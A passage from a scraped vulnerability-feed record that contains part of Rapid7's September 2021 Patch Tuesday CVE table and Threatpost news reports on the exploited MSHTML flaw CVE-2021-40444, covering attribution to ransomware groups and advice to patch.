\n[CVE-2021-30615](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30615>) | Chromium: CVE-2021-30615 Cross-origin data leak in Navigation | No | No | | Yes \n[CVE-2021-30614](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30614>) | Chromium: CVE-2021-30614 Heap buffer overflow in TabStrip | No | No | | Yes \n[CVE-2021-30613](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30613>) | Chromium: CVE-2021-30613 Use after free in Base internals | No | No | | Yes \n[CVE-2021-30612](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30612>) | Chromium: CVE-2021-30612 Use after free in WebRTC | No | No | | Yes \n[CVE-2021-30611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30611>) | Chromium: CVE-2021-30611 Use after free in WebRTC | No | No | | Yes \n[CVE-2021-30610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30610>) | Chromium: CVE-2021-30610 Use after free in Extensions API | No | No | | Yes \n[CVE-2021-30609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30609>) | Chromium: CVE-2021-30609 Use after free in Sign-In | No | No | | Yes \n[CVE-2021-30608](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30608>) | Chromium: CVE-2021-30608 Use after free in Web Share | No | No | | Yes \n[CVE-2021-30607](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30607>) | Chromium: CVE-2021-30607 Use after free in Permissions | No | No | | Yes \n[CVE-2021-30606](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30606>) | Chromium: CVE-2021-30606 Use after free in Blink | No | No | | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36952>) | Visual Studio Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-26434](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26434>) | Visual Studio Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26437](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26437>) | Visual Studio Code Spoofing Vulnerability | No | No | 5.5 | No \n \n## ESU Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-38625](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38625>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-38626](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38626>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36968>) | Windows DNS Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n \n## Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-40440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40440>) | Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | No | No | 5.4 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-38656](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38656>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-38651](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38651>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-38652](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38652>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-38653](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38653>) | Microsoft Office Visio Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-38654](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38654>) | Microsoft Office Visio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-38650](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38650>) | Microsoft Office Spoofing Vulnerability | No | No | 7.6 | Yes \n[CVE-2021-38659](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38659>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-38658](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38658>) | Microsoft Office Graphics Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-38660](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38660>) | Microsoft Office Graphics Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-38657](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38657>) | Microsoft Office Graphics Component Information Disclosure Vulnerability | No | No | 6.1 | Yes \n[CVE-2021-38646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38646>) | Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-38655](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38655>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36967](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36967>) | Windows WLAN AutoConfig Service Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-36966](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36966>) | Windows Subsystem for Linux Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-38637](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38637>) | Windows Storage Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-36972](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36972>) | Windows SMB Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-36974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36974>) | Windows SMB Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36973>) | Windows Redirected Drive Buffering System Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-38624](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38624>) | Windows Key Storage Provider Security Feature Bypass Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-36954](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36954>) | Windows Bind Filter Driver Elevation of Privilege Vulnerability | No | No | 8.8 | No \n[CVE-2021-36975](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36975>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-38634](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38634>) | Microsoft Windows Update Client Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-38644](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38644>) | Microsoft MPEG-2 Video Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-38661](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38661>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-38632](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38632>) | BitLocker Security Feature Bypass Vulnerability | No | No | 5.7 | Yes \n \n## Windows ESU Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36965](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36965>) | Windows WLAN AutoConfig Service Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-26435](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26435>) | Windows Scripting Engine Memory Corruption Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-36960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36960>) | Windows SMB Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36969](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36969>) | Windows Redirected Drive Buffering SubSystem Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-38635](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38635>) | Windows Redirected Drive Buffering SubSystem Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-38636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38636>) | Windows Redirected Drive Buffering SubSystem Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-38667](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38667>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-38671](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38671>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40447](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40447>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36962>) | Windows Installer Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-36961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36961>) | Windows Installer Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2021-36964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36964>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-38630](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38630>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36955>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36963](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36963>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-38633](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38633>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36959>) | Windows Authenticode Spoofing Vulnerability | No | No | 5.5 | No \n[CVE-2021-38629](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38629>) | Windows Ancillary Function Driver for WinSock Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-38628](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38628>) | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-38638](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38638>) | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-38639](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38639>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>) | Microsoft MSHTML Remote Code Execution Vulnerability | Yes | Yes | 8.8 | Yes", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-15T03:44:31", "type": "rapid7blog", "title": "Patch Tuesday - September 2021", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1678", "CVE-2021-26434", "CVE-2021-26435", "CVE-2021-26436", "CVE-2021-26437", "CVE-2021-26439", "CVE-2021-30606", "CVE-2021-30607", "CVE-2021-30608", "CVE-2021-30609", "CVE-2021-30610", "CVE-2021-30611", "CVE-2021-30612", "CVE-2021-30613", "CVE-2021-30614", "CVE-2021-30615", "CVE-2021-30616", "CVE-2021-30617", "CVE-2021-30618", "CVE-2021-30619", "CVE-2021-30620", "CVE-2021-30621", "CVE-2021-30622", "CVE-2021-30623", "CVE-2021-30624", "CVE-2021-30632", "CVE-2021-36930", "CVE-2021-36952", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36956", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36968", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38625", "CVE-2021-38626", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38641", "CVE-2021-38642", "CVE-2021-38644", "CVE-2021-38645", "CVE-2021-38646", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-38650", "CVE-2021-38651", "CVE-2021-38652", "CVE-2021-38653", "CVE-2021-38654", "CVE-2021-38655", "CVE-2021-38656", "CVE-2021-38657", "CVE-2021-38658", "CVE-2021-38659", "CVE-2021-38660", "CVE-2021-38661", "CVE-2021-38667", "CVE-2021-38669", "CVE-2021-38671", "CVE-2021-40440", "CVE-2021-40444", "CVE-2021-40447", "CVE-2021-40448"], "modified": "2021-09-15T03:44:31", "id": "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046", "href": "https://blog.rapid7.com/2021/09/15/patch-tuesday-september-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-09-17T12:16:20", "description": "Criminals behind the Ryuk ransomware were early exploiters of the Windows MSHTML flaw, actively leveraging the bug in campaigns ahead of a patch released by [Microsoft](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) this week.\n\nCollaborative research by Microsoft and RiskIQ revealed campaigns by Ryuk threat actors early on that exploited the flaw, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The bug is a remote code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents. The two [released](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) [separate reports](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) online this week to provide a look into who has been using the flaw\u2013which can be used to hide a malicious ActiveX control in an Office document\u2013in attacks, as well as their potential connections to known criminal groups.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nSpecifically, most of the attacks that researchers analyzed used MSHTML as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders, which communicated with an infrastructure that is associated with multiple cybercriminal campaigns\u2013including human-operated ransomware, researchers from the Microsoft 365 Defender Threat Intelligence Team at the Microsoft Threat Intelligence Center (MSTIC) reported.\n\nRiskIQ identified the ransomware infrastructure as potentially belonging to the Russian-speaking [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) crime syndicate, known to maintain and distribute Ryuk ransomware.\n\n\u201cBased on multiple overlapping patterns in network infrastructure setup and use, we assess with high confidence that the operators behind the zero-day campaign are using infrastructure affiliated with Wizard Spider (CrowdStrike), and/or related groups UNC1878 (FireEye/Mandiant) and Ryuk (public), who continue to use Ryuk/Conti and BazaLoader/BazarLoader malware in targeted ransomware campaigns,\u201d RiskIQ\u2019s Team Atlas wrote in its analysis.\n\nMicrosoft stopped short of specifically identifying the threat actors observed exploiting the MSHTML flaw, instead referring to unidentified perpetrators as \u201cdevelopment groups\u201d using the prefix \u201cDEV\u201d and a number to indicate an emerging threat group.\n\n## **Separate Campaigns, Threat Actors**\n\nIn its analysis, the company cites activity from three DEV groups since August that have been seen in attacks leveraging CVE-2021-40444: DEV-0365, DEV-0193 and DEV-0413.\n\nThe infrastructure the company associates with DEV-0365 was used in the Cobalt Strike campaigns and follow-on activity, indicating \u201cmultiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware),\u201d according to researchers. However, DEV-0365 potentially may be involved only as a command-and-control infrastructure as a service for cybercriminals, the company said.\n\n\u201cAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads \u2014 activity that overlaps with a group Microsoft tracks as DEV-0193,\u201d the team said.\n\nMicrosoft attributed another campaign using the vulnerability to a group identified as DEV-0413. This campaign is \u201csmaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure,\u201d and was observed exploiting the flaw as early as Aug. 18.\n\nThe campaign used a social-engineering lure that aligned with the business operations of targeted organizations, \u201csuggesting a degree of purposeful targeting,\u201d the company observed.\n\n\u201cThe campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted,\u201d they wrote. \u201cIn most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\u201d\n\n## **History of a Vulnerability**\n\nMicrosoft first [revealed](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) the MSHTML zero-day vulnerability on Sept. 7, joining the Cybersecurity and Infrastructure Security Agency (CISA) in warning organizations of the bug and urging mitigations in separate alerts released that day.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \nSomeone would have to open the malicious document for an attack to be successful, the company said. This is why attackers use email campaigns with lures that appear relevant to their targets in the hopes that they will launch embedded documents, researchers said.\n\nIndeed, at least one of the campaigns Microsoft researchers observed included emails impersonating contracts and legal agreements to try to trick victims to opening the documents to distribute the payload.\n\nThough it\u2019s not completely certain if Wizard Spider is behind some of these early attacks, it\u2019s clear that ransomware operators are interested in exploiting the MSHTML flaw, according to RiskIQ.\n\nHowever, at this point, \u201cwe assume there has been limited deployment of this zero-day,\u201d researchers wrote. That means that even if known ransomware criminals are involved in the attacks, delivering ransomware may not be the ultimate goal of the campaigns, they observed.\n\n\u201cInstead, we assess with medium confidence that the goal of the operators behind the zero-day may, in fact be traditional espionage,\u201d RISKIQ\u2019s Team Atlas wrote. \u201cThis goal could easily be obscured by a ransomware deployment and blend into the current wave of targeted ransomware attacks.\u201d\n\nNo matter, organizations should take advantage of the patch Microsoft released this week for the vulnerability and update their systems now before more attacks occur, the company reiterated. \u201cCustomers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability,\u201d the MSTIC team wrote.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-17T12:07:59", "type": "threatpost", "title": "Microsoft MSHTML Flaw Exploited by Ryuk Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T12:07:59", "id": "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "href": "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-08T12:29:02", "description": "Both Microsoft and federal cybersecurity officials are urging organizations to use mitigations to combat a zero-day remote control execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\nMicrosoft has not revealed much about the MSHTML bug, tracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), beyond that it is \u201caware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\u201d according to an advisory released Tuesday.\n\nHowever, it\u2019s serious
Exploit for Vulnerability in Microsoft
